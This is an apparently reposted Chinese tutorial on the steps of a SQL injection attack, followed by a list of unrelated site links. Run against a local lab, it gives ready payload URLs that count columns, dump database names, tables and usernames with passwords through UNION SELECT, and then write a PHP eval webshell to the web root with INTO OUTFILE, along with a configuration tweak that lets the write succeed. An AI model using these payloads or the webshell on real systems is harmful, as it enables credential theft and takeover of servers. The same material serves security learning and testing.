web渗透——SQL注入漏洞攻击步骤
来源:互联网 发布:如何找手机淘宝优惠券 编辑:程序博客网 时间:2024/06/08 23:48
注入思想:
1、找到注入点:判断是否有漏洞,寻找插入位置
2、构造注入语句,并在注入点注入形成新的SQL语句
3、新形成的SQL语句提交数据库处理
4、数据库执行新的SQL语句,引发注入攻击
操作流程
1、寻找注入点:
http://127.0.0.1/sql/1/?id=1'
2、爆出列数:
http://127.0.0.1/sql/1/?id=1'+ORDER+BY+4 --+
http://127.0.0.1/sql/1/?id=1'+ORDER+BY+5 --+
3、一次性显示数据库名称、版本号:
http://127.0.0.1/sql/1/?id=1'+UNION+ALL+SELECT+1,2,3,4 --+
http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4 --+
4、获取库名:
http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4 --+
5、获取表名:
http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7365637572697479),4 --+
6、获取列名:
http://127.0.0.1/sql/1/?id=-1' UNION ALL SELECT1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273),3,4--+
7、获取用户数据信息:
http://127.0.0.1/sql/1/?id=-1' UNION ALL SELECT 1,(SELECT+GROUP_CONCAT(id,username,password,lei+SEPARATOR+0x3c62723e)+FROM+security.users),3,4--+
8、Getshell:
http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,3,"<?php @eval($_POST['as']); ?>" into outfile "D://Study SoftWare//phpstudy//PHPTutorial//WWW//webshell123.php" --+
这种情况下,是phpstudy的文件权限只可读;在数据库配置文件my.ini中的[mysqld]模块中插入secure_file_priv="D:/StudySoftWare/phpstudy/PHPTutorial/WWW"即可,其中绝对路径可以修改。
- web渗透——SQL注入漏洞攻击步骤
- web渗透—SQL注入思路
- SQL注入漏洞攻击
- Sql 注入漏洞攻击
- sql注入漏洞攻击
- SQL注入漏洞攻击
- sql注入漏洞攻击
- Sql注入漏洞攻击
- 渗透攻防Web篇-SQL注入攻击初级
- 渗透攻防Web篇-SQL注入攻击中级
- 渗透攻防Web篇-SQL注入攻击高级
- 渗透攻防Web篇-SQL注入攻击初级
- 渗透攻防Web篇-SQL注入攻击初级 1
- 渗透攻防web篇-sql注入攻击中级
- web渗透—xss攻击
- 黑马程序员——SQL注入漏洞攻击
- 黑马程序员——SQL注入漏洞攻击
- 11.27Sql注入漏洞攻击
- 数据结构与算法(Java描述)-2、算法的设计目标与性能指标
- .tar.bz2文件解压命令
- webservice怎么简单的使用
- 社交系统ThinkSNS 老用户感恩回馈活动
- ExpandableList 点击无法展开的原因及解决方案
- web渗透——SQL注入漏洞攻击步骤
- iPhone自定义铃声(最新iTunes12.7)
- 基于ubuntu16.04下opencv3.2安装配置
- 监管发狂!金融平台临死冲刺IPO,高增长率不可持续!
- 《Web前端开发修炼之道》-读书笔记CSS部分
- 。。。。。
- java高并发程序设计总结一:走进并行世界
- Java后端开发常见面试题目汇总
- 学习心得